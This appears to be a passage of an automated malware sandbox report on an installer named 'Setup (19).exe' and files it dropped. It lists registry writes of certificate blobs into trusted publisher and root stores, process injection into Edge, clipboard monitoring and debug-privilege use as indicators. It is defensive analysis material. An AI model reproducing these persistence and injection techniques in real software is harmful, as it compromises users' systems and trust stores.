Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be	Setup.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	GameBoxWin64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Setup (19).exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Setup (19).exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	GameBoxWin64.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f	Setup.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA	GameBoxWin64.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 0f00000001000000200000002dc1a6a6cb0cb42f7e0d2c56f38bc7decbccd143405f669070ce130f9249ba48030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f	GameBoxWin64.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXE

pid process

2532 PING.EXE
8292 PING.EXE

pid	process
2532	PING.EXE
8292	PING.EXE

Script User-Agent 32 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	207	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	441	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	139	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	143	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	193	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	209	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	345	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	134	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	338	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	445	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	138	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	206	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	210	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	223	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	389	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	378	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	416	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	176	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	199	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	220	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	252	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	377	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	183	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	423	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	202	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	204	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	213	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	350	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	174	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	388	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	418	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	453	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Setup (19).exeH_GAN4lymZYNIe2SYb1o6PjL.exe

pid	process
3128	Setup (19).exe
3128	Setup (19).exe
3820	H_GAN4lymZYNIe2SYb1o6PjL.exe
3820	H_GAN4lymZYNIe2SYb1o6PjL.exe
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

3016

Suspicious behavior: MapViewOfSection 23 IoCs

Processes:

H_GAN4lymZYNIe2SYb1o6PjL.exe0UDlIYAqdx58fbBuKxF2FjgJ.exeMicrosoftEdgeCP.execfsafjcMicrosoftEdgeCP.execfsafjcMicrosoftEdgeCP.execfsafjc

pid	process
3820	H_GAN4lymZYNIe2SYb1o6PjL.exe
2460	0UDlIYAqdx58fbBuKxF2FjgJ.exe
8948	MicrosoftEdgeCP.exe
8948	MicrosoftEdgeCP.exe
8948	MicrosoftEdgeCP.exe
8948	MicrosoftEdgeCP.exe
6596	cfsafjc
2416	MicrosoftEdgeCP.exe
2416	MicrosoftEdgeCP.exe
2416	MicrosoftEdgeCP.exe
2416	MicrosoftEdgeCP.exe
2416	MicrosoftEdgeCP.exe
2416	MicrosoftEdgeCP.exe
7324	cfsafjc
4644	MicrosoftEdgeCP.exe
4644	MicrosoftEdgeCP.exe
4644	MicrosoftEdgeCP.exe
4644	MicrosoftEdgeCP.exe
3420	cfsafjc
4644	MicrosoftEdgeCP.exe
4644	MicrosoftEdgeCP.exe
4644	MicrosoftEdgeCP.exe
4644	MicrosoftEdgeCP.exe

Suspicious behavior: SetClipboardViewer 4 IoCs

Processes:

4164647.exe5515754.exeRuntimeBroker.exeRuntimeBroker.exe

pid process

5744 4164647.exe
6892 5515754.exe
8324 RuntimeBroker.exe
6024 RuntimeBroker.exe

pid	process
5744	4164647.exe
6892	5515754.exe
8324	RuntimeBroker.exe
6024	RuntimeBroker.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

qhRWdCBRrOEeIDbo7QDZo256.exeJehn52WtbMKZ9kxobh4J4A03.exeuwtBY5_fgfWhsQUfzRGn9ts8.exe0NKIqxJZOxkSqcoqQk5gff41.exeWgAQMBbuvnZa4Uim1cKe4vXj.exe9V6mnXHdynq1s7PpT244URZa.exetfmFgK9w71TpTpJqhUlQRQle.exeMCy69zYoC6A83qNV7PWC49cY.exegdCjIZ3vQLrTFWKdOezjL1wn.exeIvXEuwW59N_cXWlDbgjIyNx7.exeWerFault.exe8md1vxAwe7Y0ndRiBYaafLjk.exe4726380.exeWerFault.exeanyname.exeWerFault.exe2310645.exeMicrosoftEdgeCP.exeWerFault.exeWerFault.exeWerFault.exe

description	pid	process
Token: SeDebugPrivilege	2624	qhRWdCBRrOEeIDbo7QDZo256.exe
Token: SeDebugPrivilege	1184	Jehn52WtbMKZ9kxobh4J4A03.exe
Token: SeDebugPrivilege	4052	uwtBY5_fgfWhsQUfzRGn9ts8.exe
Token: SeDebugPrivilege	2136	0NKIqxJZOxkSqcoqQk5gff41.exe
Token: SeDebugPrivilege	3336	WgAQMBbuvnZa4Uim1cKe4vXj.exe
Token: SeDebugPrivilege	3492	9V6mnXHdynq1s7PpT244URZa.exe
Token: SeDebugPrivilege	4360	tfmFgK9w71TpTpJqhUlQRQle.exe
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeDebugPrivilege	4380	MCy69zYoC6A83qNV7PWC49cY.exe
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeDebugPrivilege	4396	gdCjIZ3vQLrTFWKdOezjL1wn.exe
Token: SeDebugPrivilege	4564	IvXEuwW59N_cXWlDbgjIyNx7.exe
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeRestorePrivilege	4812	WerFault.exe
Token: SeBackupPrivilege	4812	WerFault.exe
Token: SeDebugPrivilege	4812	WerFault.exe
Token: SeDebugPrivilege	492	8md1vxAwe7Y0ndRiBYaafLjk.exe
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeDebugPrivilege	3572	4726380.exe
Token: SeDebugPrivilege	4728	WerFault.exe
Token: SeDebugPrivilege	4544	anyname.exe
Token: SeDebugPrivilege	2032	WerFault.exe
Token: SeDebugPrivilege	4468	2310645.exe
Token: SeDebugPrivilege	4428	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4212	WerFault.exe
Token: SeDebugPrivilege	4736	WerFault.exe
Token: SeDebugPrivilege	5000	WerFault.exe
Token: SeIncreaseQuotaPrivilege	4428	MicrosoftEdgeCP.exe
Token: SeSecurityPrivilege	4428	MicrosoftEdgeCP.exe
Token: SeTakeOwnershipPrivilege	4428	MicrosoftEdgeCP.exe
Token: SeLoadDriverPrivilege	4428	MicrosoftEdgeCP.exe
Token: SeSystemProfilePrivilege	4428	MicrosoftEdgeCP.exe
